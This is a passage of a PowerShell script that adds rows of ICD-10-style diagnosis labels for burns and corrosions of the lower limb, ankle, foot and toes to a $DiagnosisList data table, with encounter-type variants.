first degree of multiple sites of left lower limb, except ankle and foot","Corrosion of first degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of first degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of right lower limb, except ankle and foot","Corrosion of second degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of right lower limb, except ankle and foot","Corrosion of second degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of right lower limb, except ankle and foot","Corrosion of second degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of left lower limb, except ankle and foot","Corrosion of second degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of left lower limb, except ankle and foot","Corrosion of second degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of left lower limb, except ankle and foot","Corrosion of second degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of second degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thigh","Corrosion of second degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thigh","Corrosion of second degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right thigh","Corrosion of second degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thigh","Corrosion of second degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thigh","Corrosion of second degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left thigh","Corrosion of second degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thigh","Corrosion of second degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thigh","Corrosion of second degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified thigh","Corrosion of second degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right knee","Corrosion of second degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right knee","Corrosion of second degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right knee","Corrosion of second degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left knee","Corrosion of second degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left knee","Corrosion of second degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left knee","Corrosion of second degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified knee","Corrosion of second degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified knee","Corrosion of second degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified knee","Corrosion of second degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right lower leg","Corrosion of second degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right lower leg","Corrosion of second degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right lower leg","Corrosion of second degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left lower leg","Corrosion of second degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left lower leg","Corrosion of second degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left lower leg","Corrosion of second degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified lower leg","Corrosion of second degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified lower leg","Corrosion of second degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified lower leg","Corrosion of second degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right lower limb, except ankle and foot","Corrosion of second degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right lower limb, except ankle and foot","Corrosion of second degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right lower limb, except ankle and foot","Corrosion of second degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left lower limb, except ankle and foot","Corrosion of second degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left lower limb, except ankle and foot","Corrosion of second degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left lower limb, except ankle and foot","Corrosion of second degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of second degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of right lower limb, except ankle and foot","Corrosion of third degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of right lower limb, except ankle and foot","Corrosion of third degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of right lower limb, except ankle and foot","Corrosion of third degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of left lower limb, except ankle and foot","Corrosion of third degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of left lower limb, except ankle and foot","Corrosion of third degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of left lower limb, except ankle and foot","Corrosion of third degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of third degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thigh","Corrosion of third degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thigh","Corrosion of third degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right thigh","Corrosion of third degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thigh","Corrosion of third degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thigh","Corrosion of third degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left thigh","Corrosion of third degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thigh","Corrosion of third degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thigh","Corrosion of third degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified thigh","Corrosion of third degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right knee","Corrosion of third degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right knee","Corrosion of third degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right knee","Corrosion of third degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left knee","Corrosion of third degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left knee","Corrosion of third degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left knee","Corrosion of third degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified knee","Corrosion of third degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified knee","Corrosion of third degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified knee","Corrosion of third degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right lower leg","Corrosion of third degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right lower leg","Corrosion of third degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right lower leg","Corrosion of third degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left lower leg","Corrosion of third degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left lower leg","Corrosion of third degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left lower leg","Corrosion of third degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified lower leg","Corrosion of third degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified lower leg","Corrosion of third degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified lower leg","Corrosion of third degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right lower limb, except ankle and foot","Corrosion of third degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right lower limb, except ankle and foot","Corrosion of third degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right lower limb, except ankle and foot","Corrosion of third degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left lower limb, except ankle and foot","Corrosion of third degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left lower limb, except ankle and foot","Corrosion of third degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left lower limb, except ankle and foot","Corrosion of third degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of third degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ankle","Burn of unspecified degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ankle","Burn of unspecified degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ankle","Burn of unspecified degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ankle","Burn of unspecified degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ankle","Burn of unspecified degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ankle","Burn of unspecified degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ankle","Burn of unspecified degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ankle","Burn of unspecified degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ankle","Burn of unspecified degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right foot","Burn of unspecified degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right foot","Burn of unspecified degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right foot","Burn of unspecified degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left foot","Burn of unspecified degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left foot","Burn of unspecified degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left foot","Burn of unspecified degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified foot","Burn of unspecified degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified foot","Burn of unspecified degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified foot","Burn of unspecified degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right toe(s) (nail)","Burn of unspecified degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right toe(s) (nail)","Burn of unspecified degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right toe(s) (nail)","Burn of unspecified degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left toe(s) (nail)","Burn of unspecified degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left toe(s) (nail)","Burn of unspecified degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left toe(s) (nail)","Burn of unspecified degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified toe(s) (nail)","Burn of unspecified degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified toe(s) (nail)","Burn of unspecified degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified toe(s) (nail)","Burn of unspecified degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right ankle and foot","Burn of unspecified degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right ankle and foot","Burn of unspecified degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right ankle and foot","Burn of unspecified degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left ankle and foot","Burn of unspecified degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left ankle and foot","Burn of unspecified degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left ankle and foot","Burn of unspecified degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified ankle and foot","Burn of unspecified degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified ankle and foot","Burn of unspecified degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified ankle and foot","Burn of unspecified degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ankle","Burn of first degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ankle","Burn of first degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ankle","Burn of first degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ankle","Burn of first degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ankle","Burn of first degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ankle","Burn of first degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ankle","Burn of first degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ankle","Burn of first degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ankle","Burn of first degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right foot","Burn of first degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right foot","Burn of first degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right foot","Burn of first degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left foot","Burn of first degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left foot","Burn of first degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left foot","Burn of first degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified foot","Burn of first degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified foot","Burn of first degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified foot","Burn of first degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right toe(s) (nail)","Burn of first degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right toe(s) (nail)","Burn of first degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right toe(s) (nail)","Burn of first degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left toe(s) (nail)","Burn of first degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left toe(s) (nail)","Burn of first degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left toe(s) (nail)","Burn of first degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified toe(s) (nail)","Burn of first degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified toe(s) (nail)","Burn of first degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified toe(s) (nail)","Burn of first degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right ankle and foot","Burn of first degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right ankle and foot","Burn of first degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right ankle and foot","Burn of first degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left ankle and foot","Burn of first degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left ankle and foot","Burn of first degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left ankle and foot","Burn of first degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified ankle and foot","Burn of first degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified ankle and foot","Burn of first degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified ankle and foot","Burn of first degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ankle","Burn of second degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ankle","Burn of second degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ankle","Burn of second degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ankle","Burn of second degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ankle","Burn of second degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ankle","Burn of second degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ankle","Burn of second degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ankle","Burn of second degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ankle","Burn of second degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right foot","Burn of second degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right foot","Burn of second degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right foot","Burn of second degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left foot","Burn of second degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left foot","Burn of second degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left foot","Burn of second degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified foot","Burn of second degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified foot","Burn of second degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified foot","Burn of second degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right toe(s) (nail)","Burn of second degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right toe(s) (nail)","Burn of second degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right toe(s) (nail)","Burn of second degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left toe(s) (nail)","Burn of second degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left toe(s) (nail)","Burn of second degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left toe(s) (nail)","Burn of second degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified toe(s) (nail)","Burn of second degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified toe(s) (nail)","Burn of second degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified toe(s) (nail)","Burn of second degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right ankle and foot","Burn of second degree of multiple sites of right ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right ankle and foot","Burn of second degree of multiple sites of right ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right ankle and foot","Burn of second degree of multiple sites of right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left ankle and foot","Burn of second degree of multiple sites of left ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left ankle and foot","Burn of second degree of multiple sites of left ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left ankle and foot","Burn of second degree of multiple sites of left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified ankle and foot","Burn of second degree of multiple sites of unspecified ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified ankle and foot","Burn of second degree of multiple sites of unspecified ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified ankle and foot","Burn of second degree of multiple sites of unspecified ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ankle","Burn of third degree of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ankle","Burn of third degree of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ankle","Burn of third degree of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ankle","Burn of third degree of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ankle","Burn of third degree of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left ankle","Burn of third degree of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ankle","Burn of third degree of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ankle","Burn of third degree of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified ankle","Burn of third degree of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right foot","Burn of third degree of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right foot","Burn of third degree of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right foot","Burn of third degree of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left foot","Burn of third degree of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left foot","Burn of third degree of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left foot","Burn of third degree of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified foot","Burn of third degree of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified foot","Burn of third degree of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified foot","Burn of third degree of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right toe(s) (nail)","Burn of third degree of right toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right toe(s) (nail)","Burn of third degree of right toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right toe(s) (nail)","Burn of third degree of right toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left toe(s) (nail)","Burn of third degree of left toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left toe(s) (nail)","Burn of third degree of left toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left toe(s) (nail)","Burn of third degree of left toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified toe(s) (nail)","Burn of third degree of unspecified toe(s) (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified toe(s) (nail)","Burn of third degree of unspecified toe(s) (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified toe(s) (nail)","Burn of third degree of unspecified toe(s) (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right ankle and foot","Burn of third degree 